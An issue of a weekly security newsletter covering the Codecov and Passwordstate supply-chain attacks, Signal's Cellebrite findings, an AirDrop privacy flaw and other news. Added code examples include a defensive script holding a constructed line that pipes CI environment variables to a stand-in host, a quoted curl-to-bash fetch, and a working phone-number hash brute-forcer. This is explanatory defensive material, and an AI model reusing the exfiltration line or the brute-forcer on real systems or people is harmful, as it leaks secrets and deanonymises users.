this week in security — april 25 edition
~this week in security~ a cybersecurity newsletter by @zackwhittaker (https://twitter.com/zackwhittaker)
volume 4, issue 17
~ ~
** THIS WEEK, TL;DR
Signal CEO finds security flaws in Cellebrite UFED hardware (https://signal.org/blog/cellebrite-vulnerabilities/) Signal: A few weeks ago, phone forensics company Cellebrite claimed it ‘cracked’ Signal and could extract encrypted messages from an unlocked(!) Android device. Signal’s end-to-end encryption had not been broken, despite some breathless headlines suggesting otherwise. Now, the tables have turned. This week @moxie (https://twitter.com/moxie/status/1384908290115739649) said he acquired a Cellebrite UFED device that he saw “fall off a truck” (was it a turnip truck?), and found several security vulnerabilities in the device’s code that can be triggered by an app on the phone under inspection. It was an incredible troll, and an extremely well-thought-out one, because it shows the significant repercussions (https://twitter.com/Riana_Crypto/status/1384936758484348928) for the integrity of the data that Cellebrite devices collect (i.e. police evidence). Turns out even police are starting to notice (https://www.forbes.com/sites/thomasbrewster/2021/04/22/cops-iphone-hacking-tools-are-sometimes-insecure-and-buggy/) how buggy this equipment can sometimes be. @meganmcgraham (https://twitter.com/meganmcgraham/status/1385328535695355907?s=20) has a really good thread on why this matters.
More: Motherboard (https://www.vice.com/en/article/k78q5y/signal-ceo-hacks-cellebrite-iphone-hacking-device-used-by-cops) | @Forbes (https://www.forbes.com/sites/thomasbrewster/2021/04/22/cops-iphone-hacking-tools-are-sometimes-insecure-and-buggy/?sh=49ee9b61287f) | Ars Technica (https://arstechnica.com/information-technology/2021/04/in-epic-hack-signal-developer-turns-the-tables-on-forensics-firm-cellebrite/) | @riana_crypto (https://twitter.com/Riana_Crypto/status/1384936758484348928)
https://twitter.com/selenalarson/status/1382677625139781633?s=20
Codecov hackers breached hundreds of restricted customer sites (https://www.reuters.com/technology/codecov-hackers-breached-hundreds-restricted-customer-sites-sources-2021-04-19/) Reuters: Malicious attackers who tampered with Codecov’s software development tools gained “restricted access to hundreds” of its customers’ networks, according to sources speaking to Reuters. The company’s tool measures how much of a project’s source code is exercised by its tests, and it runs inside customers’ CI pipelines. Investigators say attackers tampered with the Bash Uploader script so that it exfiltrated environment variables from those pipelines, which commonly hold credentials used in the software development process, such as AWS keys. Some 29,000 enterprise clients could be affected; the tampering dates back to January 31. HashiCorp has already confirmed (https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/) it is affected. But it’s still early to know just how far this attack reaches. More: Codecov (https://about.codecov.io/security-update/) | Ars Technica (https://arstechnica.com/gadgets/2021/04/backdoored-developer-tool-that-stole-credentials-escaped-notice-for-3-months/)
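The Codecov attack worked because CI jobs ran whatever bytes the server returned, typically via `bash <(curl -s https://codecov.io/bash)`, with every job secret sitting in the environment. The check a practitioner wants is to pin the digest of the script version they reviewed and refuse to execute anything else. The block below is an added example, not Codecov’s code: the script bodies, the pinned digest and the attacker-style exfiltration line (pointing at a TEST-NET address) are all constructed for the demo.

```python
"""Pin-and-verify a remotely fetched CI helper script before executing it.

Added example (not Codecov's tooling). Instead of piping a download straight
into bash, the pipeline fetches the bytes, checks their SHA-256 against a
digest recorded in the repository, and only then runs them. A mismatch is a
build failure, not a warning.
"""
import hashlib
import hmac
import os
import subprocess
import tempfile

# Constructed stand-in for the upstream uploader script as reviewed and pinned.
PINNED_SCRIPT = (
    b"#!/usr/bin/env bash\n"
    b"set -euo pipefail\n"
    b"echo 'uploading coverage report'\n"
)

# The digest a team records in its CI config after reviewing the script.
# Computed here from the constructed script; in practice it is taken from the
# vendor's published checksum and checked into the repo next to the pipeline.
PINNED_SHA256 = hashlib.sha256(PINNED_SCRIPT).hexdigest()

# Constructed tampered variant: the same script plus one line that ships the
# job's environment variables off-box (203.0.113.10 is a documentation
# address). This is the class of modification the article describes.
TAMPERED_SCRIPT = PINNED_SCRIPT + (
    b"env | curl -s -X POST --data-binary @- http://203.0.113.10/collect\n"
)


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of the script bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script: bytes, pinned_hex: str) -> bool:
    """True only when the fetched script hashes to the pinned digest.

    compare_digest avoids early-exit comparison; cheap habit for any check
    that gates execution, even though the digest itself is not secret."""
    return hmac.compare_digest(sha256_hex(script), pinned_hex)


def run_pinned(script: bytes, pinned_hex: str) -> int:
    """Execute the script with bash only after verification; return its exit
    status. Raises RuntimeError on a digest mismatch so the job fails closed."""
    if not verify_script(script, pinned_hex):
        raise RuntimeError(
            f"uploader digest mismatch: expected {pinned_hex}, got {sha256_hex(script)}"
        )
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as fh:
        fh.write(script)
        path = fh.name
    try:
        return subprocess.run(["bash", path], check=False).returncode
    finally:
        os.unlink(path)


if __name__ == "__main__":
    # The reviewed script runs; the tampered one never reaches bash.
    print("genuine script exit status:", run_pinned(PINNED_SCRIPT, PINNED_SHA256))
    try:
        run_pinned(TAMPERED_SCRIPT, PINNED_SHA256)
    except RuntimeError as err:
        print("blocked:", err)
```

In a real pipeline the bytes come from `urllib.request.urlopen(url).read()` or an equivalent fetch; the point is that the fetch and the decision to execute are separated by a digest comparison against a value the attacker cannot change by compromising the download server. A pinned digest also means a legitimate upstream update fails the build until someone reviews it and bumps the pin, which is the behaviour you want.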
Facebook downplays breach in internal email as another set of data leaks (https://www.bbc.com/news/technology-56815478) BBC News: Facebook accidentally leaked an email to a reporter describing the mass scraping of Facebook users’ phone numbers as a normal occurrence. Except, it’s not and that’s just Facebook desperately trying to spin. News of the embarrassing self-own landed in the same week as yet another tool was discovered to link email addresses to Facebook accounts, per Motherboard (https://www.vice.com/en/article/bvz8pz/tool-finds-facebook-email-addresses) . More: @ashk4n (https://twitter.com/ashk4n/status/1384567455377285122)
Backdoored password manager stole data from as many as 29,000 enterprises (https://arstechnica.com/gadgets/2021/04/hackers-backdoor-corporate-password-manager-and-steal-customer-data/) Ars Technica: Another supply chain attack was discovered this week after Passwordstate, an enterprise password manager made by Click Studios and used by 29,000 enterprise customers (including governments), was hacked through a malicious update. The malicious code pulls in a second payload, which steals passwords from the user’s vault and uploads them to the attacker’s servers. News of the attack came by way of CSIS Group (https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/) , which said it found the malicious update as part of an investigation. Click Studios hasn’t made any public remarks yet, but warned customers by email to reset ‘all’ passwords stored in Passwordstate. More: CSIS Group (https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/) | The Record (https://therecord.media/password-manager-passwordstate-hacked-to-deploy-malware-on-customer-systems/) | VirusTotal (https://www.virustotal.com/gui/file/1ee0f14c44058e3d0d1c19b4713d573c81b49c28ed58bd41c72832c78f7d1464/detection)
A Clubhouse bug let people lurk in rooms invisibly (https://www.wired.com/story/clubhouse-bug-lurkers-ghost/) Wired ($): A bug in audio-only app Clubhouse allowed users to invisibly stay in rooms, making it impossible to remove them. “I’m going to keep talking to you, but I’m going to disappear,” said @k8em0 (https://twitter.com/k8em0/status/1384962770857234435?s=20) , who found the bug earlier this year. When she disappeared, she told Wired: “That’s the bug. I am a f**king ghost.” This was a great find, but Clubhouse was less than responsive to the bug. The bugs (two, in fact) were fixed, and the bug bounty was donated to @PayEquityNow (https://twitter.com/PayEquityNow) . Here are a few more technical details (https://www.lutasecurity.com/post/new-clubhouse-security-vulnerabilities-could-happen-to-any-growing-unicorn) about how it worked. More: Luta Security (https://www.lutasecurity.com/post/new-clubhouse-security-vulnerabilities-could-happen-to-any-growing-unicorn) | @k8emo (https://twitter.com/k8em0/status/1384962770857234435?s=20) ~ ~
** SUPPORT THIS NEWSLETTER
Thank you to everyone who reads or subscribes to this newsletter! If you can, please spare $1/month (or more for perks! (https://www.patreon.com/posts/mugs-are-on-way-32666051) ), to help cover the server and email costs. You can contribute to the Patreon (https://www.patreon.com/thisweekinsecurity) , or send a one-time donation via PayPal (http://paypal.me/thisweekinsecurity) or Venmo (https://mcusercontent.com/e1ad6038c994abec17dafb116/images/9686ed69-9c8a-4787-9b13-758569be85e4.png) . ~ ~
** THE STUFF YOU MIGHT’VE MISSED
Geico admits fraudsters stole customers’ driver’s license numbers for months (https://techcrunch.com/2021/04/19/geico-driver-license-numbers-scraped/) TechCrunch: Fraudsters used Geico’s online sales site to match hundreds of thousands of customers’ data with their driver’s license numbers as part of an apparent scam to claim fraudulent unemployment benefits. Earlier in the year, Metromile admitted (https://techcrunch.com/2021/02/02/metromile-website-bug-hacker/) a similar security lapse. (Disclosure: I wrote this story.)
U.S. Postal Service is running social media monitoring program (https://news.yahoo.com/the-postal-service-is-running-a-running-a-covert-operations-program-that-monitors-americans-social-media-posts-160022919.html) Yahoo News: The U.S. Postal Service’s law enforcement arm has a “covert operations program” that monitors the social media posts of millions of Americans, including “inflammatory” posts. Several federal government departments — and the military — have been monitoring social media posts for years (https://www.brennancenter.org/our-work/analysis-opinion/government-expanding-its-social-media-surveillance-capabilities) — but experts are stumped as to why the USPS is running this program. The program appears to “root out misuse of the postal system by online actors,” but it’s “not at all clear why their mandate would include monitoring of social media that’s unrelated to use of the postal system.” Precisely.
University of Minnesota accused of submitting buggy patches for research (https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah.com/) Greg Kroah-Hartman: This one’s a bit messy. In a mailing list post, @gregkh (https://twitter.com/gregkh/status/1384785747874656257) , a key Linux kernel developer, banned future contributions from the University of Minnesota after accusing its academics of submitting buggy patches to the Linux kernel. The academics released a paper earlier this year describing how it’s possible to introduce bugs without the maintainer’s knowledge. (This isn’t a new concept.) Kroah-Hartman said the community doesn’t appreciate “being experimented on.” The university later apologized (https://twitter.com/umncomputersci/status/1384948683821694976?s=21) . Here’s a good explainer (https://www.labbott.name/blog/2021/04/21/breakingtrust.html) on the situation by @openlabbott (https://twitter.com/openlabbott) .
Lea Kissner joins Twitter’s security and privacy team (https://twitter.com/LeaKissner/status/1384539395005448201) Lea Kissner: Congrats to @LeaKissner (https://twitter.com/LeaKissner/status/1384539395005448201) who has joined Twitter as its head of privacy engineering. In a tweet, Kissner said they “very much like and use Twitter, so I also have some real personal interest in making it the most respectful product, system, and platform around, all the way from the humans to the hardware.” Kissner is Twitter’s latest high-profile cyber/privacy hire in the past year, after it brought on @rinkisethi (https://twitter.com/rinkisethi) and @dotmudge (https://twitter.com/dotmudge) .
Privacy weaknesses in Apple AirDrop can leak contact details (https://www.theregister.com/2021/04/22/airdrop_contact_leaks/) The Register: Smart research from German academics, who found privacy weaknesses in Apple’s wireless file sharing protocol, AirDrop, that expose the user’s contact information. “When an AirDrop connection is attempted between a sender and a receiver, the sender transmits over the air a message containing a hash, or digital fingerprint, of its user’s email address or phone number as part of an authentication handshake. In response, if the sender is recognized, the receiver transmits back its hash.” The problem is not the hash function itself but what is being hashed: a phone number has so little entropy that anyone who captures the hash can simply try every possible number until one matches, recovering the hashed value “in milliseconds.” ~ ~
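To make the brute-force point concrete, here is an added example (not code from the AirDrop research or from Apple) that hashes a phone number and then recovers it by enumerating the number space. It assumes the identifier is SHA-256 over the E.164-formatted number; the protocol’s exact normalisation and any truncation are not on this page, and the numbers used are constructed for the demo. The attacker needs no weakness in SHA-256, only the fact that there are at most ten million subscriber numbers behind a known area code.

```python
"""Recovering a SHA-256-hashed phone number by exhaustive search.

Added example. identifier_hash() models the sender's hashed identifier as the
demo assumes it is built; recover_phone() and recover_many() model a receiver
(or passive listener) who already knows the country code and area code and
simply hashes every remaining candidate.
"""
import hashlib
import time
from typing import Dict, Iterable, Optional

DIGITS = "0123456789"


def identifier_hash(phone_e164: str) -> bytes:
    """Hash of the identifier as this demo assumes the handshake computes it."""
    return hashlib.sha256(phone_e164.encode("ascii")).digest()


def _candidates(prefix: str, unknown_digits: int) -> Iterable[str]:
    """Every number with the given prefix and unknown_digits trailing digits."""
    for i in range(10 ** unknown_digits):
        yield f"{prefix}{i:0{unknown_digits}d}"


def recover_phone(target: bytes, prefix: str, unknown_digits: int) -> Optional[str]:
    """Return the number whose digest equals target, or None if not in the space."""
    for candidate in _candidates(prefix, unknown_digits):
        if hashlib.sha256(candidate.encode("ascii")).digest() == target:
            return candidate
    return None


def recover_many(targets: Iterable[bytes], prefix: str, unknown_digits: int) -> Dict[bytes, str]:
    """Recover every target digest in a single sweep of the number space.

    A listener who has collected hashes from many senders pays for one
    enumeration, not one per victim; a precomputed table makes later lookups
    free. Returns a digest -> phone number mapping for the ones found."""
    wanted = set(targets)
    found: Dict[bytes, str] = {}
    for candidate in _candidates(prefix, unknown_digits):
        digest = hashlib.sha256(candidate.encode("ascii")).digest()
        if digest in wanted:
            found[digest] = candidate
            if len(found) == len(wanted):
                break
    return found


if __name__ == "__main__":
    # Constructed victim numbers. The attacker is assumed to know "+1415"; the
    # demo fixes one more digit so the search space is 10**6 rather than 10**7,
    # which only changes the run time by a factor of ten.
    victims = ["+14155550123", "+14155559876"]
    hashes = [identifier_hash(v) for v in victims]
    start = time.perf_counter()
    recovered = recover_many(hashes, prefix="+14155", unknown_digits=6)
    elapsed = time.perf_counter() - start
    for h in hashes:
        print(h.hex()[:16], "->", recovered.get(h))
    print(f"swept 10^6 candidates in {elapsed:.2f}s")
```

The remedy is not a newer hash function: any deterministic, unkeyed digest of a low-entropy identifier falls to the same sweep. What helps is a protocol that never puts a brute-forceable digest on the air in the first place, for example a private set intersection between the two contact lists.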
** OTHER NEWSY NUGGETS
China-linked hackers used VPN flaw to target U.S. defense industry (https://www.reuters.com/technology/china-linked-hackers-used-pulse-secure-flaw-target-us-defense-industry-2021-04-20/) Security researchers say malicious actors based in China have spent months exploiting a zero-day flaw in Pulse Secure VPNs. FireEye didn’t name the targets, but said they included “defense, government, and financial organizations around the world.” Pulse Secure has an advisory (https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/) out for the 10/10 bug with some mitigations. But organizations are out of luck for a fix — no patches until May. Just today @lilyhnewman (https://twitter.com/lilyhnewman) had a great story (https://www.wired.com/story/vpn-hacks-pulse-secure-espionage/) out on the minefield of VPN hacks.
https://twitter.com/HackingLZ/status/1384636573694808065
Wyden introduces bipartisan bill to end Fourth Amendment loopholes (https://www.wyden.senate.gov/news/press-releases/wyden-paul-and-bipartisan-members-of-congress-introduce-the-fourth-amendment-is-not-for-sale-act-) Sen. @RonWyden (https://twitter.com/RonWyden/status/1384884450014777348) has a new bill with an impressive amount of bicameral and bipartisan support. The Fourth Amendment Is Not For Sale Act aims to close loopholes that allow data brokers to sell Americans’ personal information, including location data, to law enforcement without a warrant. @josephfcox (https://twitter.com/josephfcox/status/1384869828142542849) explains how the bill works (https://www.vice.com/en/article/k78qyy/fourth-amendment-is-not-for-sale-act-would-ban-clearview-and-warrantless-location-data-purchases) and what it’s meant to accomplish.
Ransomware targeted by new Justice Department task force (https://www.wsj.com/articles/ransomware-targeted-by-new-justice-department-task-force-11619014158) The DOJ has formed a task force in an effort to combat ransomware attacks by making these popular extortion schemes less lucrative by targeting the entire digital ecosystem that supports them, per the Wall Street Journal ($).
Stanford student finds glitch in ransomware payment system to save victims $27,000 (https://www.cyberscoop.com/jack-cable-qlocker-ransomware-recovery/) Stanford student @jackhcable (https://twitter.com/jackhcable/status/1385270994554687491?s=21) found a bug in the QLocker ransomware that helped dozens of victims save $27,000 in would-be ransom payments. The glitch has been fixed. But Cable said cybercriminals looking to make a quick buck are “unlikely to have a robust security team.” ~ ~
** IN MEMORIAM
This week we lost security veteran Dan Kaminsky. He was 42. @marcwrogers (https://twitter.com/marcwrogers/status/1385961838735597572) confirmed the news on Saturday. Kaminsky was one of a kind, and beloved across the security community. There have been countless tributes on Twitter (search: (@dakami) since:2021-04-24) and Hacker News (https://news.ycombinator.com/item?id=26925044) from those who knew him over the years, many referencing his tweets (https://twitter.com/dakami/status/1214041947406393349) from last January, reflecting on lessons learned from his work and career. You will be missed, Dan. Thanks for everything. May your memory be a blessing. ~ ~
** THE HAPPY CORNER
This week, a long overdue wave of blue checks flooded infosec Twitter. Blue checks are about recognizing the important and valuable work from trusted and highly respected infosec folk. Congratulations to all who received one this week! @IanColdwater (https://twitter.com/IanColdwater/status/1384948239003172866) , who was one of those (finally!) verified, has a thread (https://twitter.com/IanColdwater/status/1380320895172968449) on who else got a blue check, and who you should follow!
Next — this tweet (https://twitter.com/AccidentalCISO/status/1384155643502678030) is presented without comment. And congratulations to @marciahofmann (https://twitter.com/marciahofmann/status/1384988026258878464?s=21) , one of the finest and sharpest legal minds in cybersecurity, who this week was granted the 2021-2022 Fulbright Cyber Security Award. In her words: “Some personal news. I’m honored, grateful, and unbelievably excited to have been granted a 2021-2022 @FulbrightPrgrm Cyber Security Award.”
** CYBER CATS & FRIENDS
Meet Kenny, a shelter rescue, whose human tells me that he is very good at protecting his home. Last month, Kenny detected an intruder and the threat was immediately mitigated. What a good pup. Keep it up, Kenny. A big thanks to @OndrashMachula (https://twitter.com/OndrashMachula) for the submission! Please keep sending in your cyber cats (and their friends)! You can drop them here (mailto:this@weekinsecurity.com?Subject=Cyber%20Cat%20%28%26%20Friends%29%20submission&Body=Please%20include%20a%20JPG%20of%20your%20cyber%20cat%20%28or%20other%20non-feline%20friend%29%2C%20their%20name%2C%20and%20also%20your%20name%20and/or%20Twitter%20handle%20if%20you%20want%20credit.) , and feel free to send updates on previously-submitted friends! ~ ~
** SUGGESTION BOX
That’s all for this week. Hope to see you again next Sunday. In the meantime, you can always drop any feedback you have in the suggestion box (https://docs.google.com/forms/d/e/1FAIpQLSebkpf8z8TvMJoixuSzmrR-CTLcOv_ufF7voso1HZBI_f5zrw/viewform) . Have a good one.
~this week in security~ does not track email opens or link clicks.